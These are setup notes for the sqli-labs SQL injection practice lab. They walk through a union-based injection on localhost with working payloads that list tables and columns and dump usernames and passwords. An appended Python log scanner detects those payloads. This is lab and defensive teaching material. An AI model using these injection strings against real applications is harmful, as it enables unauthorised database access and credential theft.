File read permission: secure_file_priv is not NULL
sqli-labs is a practice target for learning SQL injection; it requires MySQL and PHP 5.
1. cd /var/www/html
2. git clone https://github.com/Audi-1/sqli-labs.git
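3. Edit ./sqli-labs/sql-connections/db-creds.inc to set the database configuration.
4. If you are using PHP 7 or later, check /var/log/apache2/error.log: mysql_connect will raise an error, so change it to mysqli_connect.
All functions starting with `mysql_` must be changed to `mysqli_`. The first argument of mysqli_query is the mysqli connection;
the first argument of mysqli_select_db is the mysqli connection and the second is the database name.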
1. hackbar
2. firebug
3. live http headers
4. tamper data
1. Use order by to determine the number of columns.
2. Use a union select query to get the table names.
0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
3. Use a union select query to get the column names.
0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
4. Use a union select query to get the column values.
0' union select 1,group_concat(username, 0x3a, password),3 from users --+
Example:
http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20order%20by%203%20--%20%27
http://127.0.0.1/sqli-labs/Less-1/?id=0%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--%20%27
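Added example, not part of the original notes or of the sqli-labs project: a small detector that flags the order by, union select and information_schema steps above when they show up in web-server access logs. The Apache common log format, the sample lines and the rule names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (Apache common log format assumed). Requests 2 and 3
# reuse the two example URLs from the notes; requests 1 and 4 are benign.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 721
127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli-labs/Less-1/?id=1%27%20order%20by%203%20--%20%27 HTTP/1.1" 200 721
127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /sqli-labs/Less-1/?id=0%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--%20%27 HTTP/1.1" 200 890
127.0.0.1 - - [01/Jan/2024:10:00:12 +0000] "GET /shop/?sort=order%20by%20price HTTP/1.1" 200 512
"""

# Hypothetical rule names; each regex targets one step of the walkthrough above.
RULES = {
    "order-by-probe": re.compile(r"\border\s+by\s+\d+"),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema-enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b"),
    "quote-comment": re.compile(r"'.*--(?:\s|$)"),
}
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Decode a second time, drop /* */ comments, collapse whitespace, lowercase."""
    value = re.sub(r"/\*.*?\*/", " ", unquote(value), flags=re.S)
    return re.sub(r"\s+", " ", value).lower()

def scan_line(line):
    """Return a finding dict for one log line, or None if no rule matches."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    hits = set()
    # parse_qsl performs the first URL decode of every parameter value.
    for param, value in parse_qsl(url.query, keep_blank_values=True):
        text = normalize(value)
        hits.update((param, rule) for rule, rx in RULES.items() if rx.search(text))
    return {"client": client, "path": url.path, "hits": sorted(hits)} if hits else None

def scan(log):
    """Scan a whole log and return only the lines that matched a rule."""
    return [f for f in map(scan_line, log.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The order-by rule requires a numeric column index, so the benign `sort=order by price` request is not flagged.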
How to Setup SQLi Penetration Testing Lab on Kali Linux
Fatal error: Call to undefined function mysql_connect()